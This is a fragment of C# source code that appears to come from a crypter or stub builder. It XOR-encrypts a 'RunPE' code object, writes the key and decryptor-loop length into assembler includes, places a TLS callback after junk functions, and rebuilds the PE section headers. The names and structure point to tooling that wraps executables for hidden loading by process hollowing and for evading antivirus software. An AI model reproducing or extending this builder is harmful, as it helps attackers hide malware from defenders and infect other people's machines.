public static void EncryptCodeAndAddKey(NewPE PE)
{
byte[] pKey = new byte[16];
Keys.PopulateBuffer(pKey);
byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes();
Xor.EncodeDecodeData(pRunPE, pKey);
if (File.Exists(PE.PeDirectory.RunPEObjectPath))
{
File.Delete(PE.PeDirectory.RunPEObjectPath);
}
PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE);
string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
string Format = pKey.ToASMBuffer();
if (File.Exists(KeyInclude))
{
File.Delete(KeyInclude);
}
File.WriteAllText(KeyInclude, Format);
PEFactory.CompileDataSection(PE);
}
public static void FixDecryptorLoop(NewPE PE)
{
string RunPELengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc");
string Format = "RUNPE_CODE_LENGTH EQU 0x{0}";
if (File.Exists(RunPELengthInclude))
{
File.Delete(RunPELengthInclude);
}
Format = string.Format(Format, PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8"));
File.WriteAllText(RunPELengthInclude, Format);
PEFactory.CompileTextSection(PE);
}
public static void ConstructTLSCallback(NewPE PE)
{
string TLSOffsetInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc");
string Format = "TLS_CALLBACK_OFFSET EQU 0x{0}";
if (File.Exists(TLSOffsetInclude))
{
File.Delete(TLSOffsetInclude);
}
Format = string.Format(Format, (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8"));
File.AppendAllText(TLSOffsetInclude, Format);
PEFactory.CompileDataSection(PE);
//PEFactory.CompileTLSSection(PE);
}
public static void CalculateSectionHeaders(NewPE PE)
{
PE_SECTION_HEADER shText = GetSectionByName(".text", PE);
PE_SECTION_HEADER shIData = GetSectionByName(".idata", PE);
PE_SECTION_HEADER shData = GetSectionByName(".data", PE);
#if TLS
PE_SECTION_HEADER shTLS = GetSectionByName(".bss", PE);
#endif
uint sizeOfText = (uint)PE.PeDirectory.TextObjectPath.ReadBytes().Length;
uint sizeOfIData = (uint)PE.PeDirectory.IDataObjectPath.ReadBytes().Length;
uint sizeOfData = (uint)PE.PeDirectory.DataObjectPath.ReadBytes().Length;
#if TLS
uint sizeOfTLS = (uint)PE.PeDirectory.TLSObjectPath.ReadBytes().Length;
#endif
/* COMPUTE TEXT */
shText.VirtualSize = sizeOfText;
shText.VirtualAddress = PE.NtHeader.OptionalHeader.SectionAlignment;
shText.SizeOfRawData = ALIGN_UP(sizeOfText, PE.NtHeader.OptionalHeader.FileAlignment);
shText.PointerToRawData = 0;
/* COMPUTE IDATA */
shIData.VirtualSize = sizeOfIData;
shIData.VirtualAddress =
((shText.VirtualAddress + ALIGN_UP(shText.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shIData.SizeOfRawData = ALIGN_UP(sizeOfIData, PE.NtHeader.OptionalHeader.FileAlignment);
shIData.PointerToRawData = 0;
/* COMPUTE DATA */
shData.VirtualSize = sizeOfData;
shData.VirtualAddress =
((shIData.VirtualAddress + ALIGN_UP(shIData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shData.SizeOfRawData = ALIGN_UP(sizeOfData, PE.NtHeader.OptionalHeader.FileAlignment);
shData.PointerToRawData = 0;
#if TLS
/* COMPUTE TLS */
shTLS.VirtualSize = sizeOfTLS;
shTLS.VirtualAddress =
((shData.VirtualAddress + ALIGN_UP(shData.SizeOfRawData, PE.NtHeader.OptionalHeader.SectionAlignment)));
shTLS.SizeOfRawData = ALIGN_UP(sizeOfTLS, PE.NtHeader.OptionalHeader.FileAlignment);
shTLS.PointerToRawData = 0;
#endif
string SectionHeadersInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "section_addresses.inc");
if (File.Exists(SectionHeadersInclude))
{
File.Delete(SectionHeadersInclude);
}
#if TLS
string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
"IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
"DATA_SECTION_ADDRESS EQU 0x{2}\n" +
"TLS_SECTION_ADDRESS EQU 0x{3}\n";
Format = string.Format(Format,
shText.VirtualAddress.ToString("X8"),
shIData.VirtualAddress.ToString("X8"),
shData.VirtualAddress.ToString("X8"),
shTLS.VirtualAddress.ToString("X8"));
#else
string Format = "TEXT_SECTION_ADDRESS EQU 0x{0}\n" +
"IDATA_SECTION_ADDRESS EQU 0x{1}\n" +
"DATA_SECTION_ADDRESS EQU 0x{2}\n";
Format = string.Format(Format,
shText.VirtualAddress.ToString("X8"),
shIData.VirtualAddress.ToString("X8"),
shData.VirtualAddress.ToString("X8"));
#endif
File.WriteAllText(SectionHeadersInclude, Format);
PEFactory.CompileTextSection(PE);
PEFactory.CompileIDataSection(PE);
PEFactory.CompileRunPESection(PE);
PEFactory.CompileDataSection(PE);
#if TLS
PEFactory.CompileTLSSection(PE);
#endif
ReplaceSectionByName(".text", shText, PE);
ReplaceSectionByName(".idata", shIData, PE);
ReplaceSectionByName(".data", shData, PE);
#if TLS
ReplaceSectionByName(".bss", shTLS, PE);
#endif
}
public void BuildNewPE()
{
PEFactory.CompileMain(this);
}
public void WriteSectionData()
{
PEFactory.AddSectionDatas(this);
}
public void ConstructSectionHeaders()
{
PEFactory.CalculateSectionHeaders(this);
}
public void ConstructNtHeaderPostSections(int nCountImportedModules)
{
PEFactory.CalculateNtHeader(this, nCountImportedModules);
}
public void ConstructNtHeaderPreSections()
{
PEFactory.InitializeNtHeader(this);
}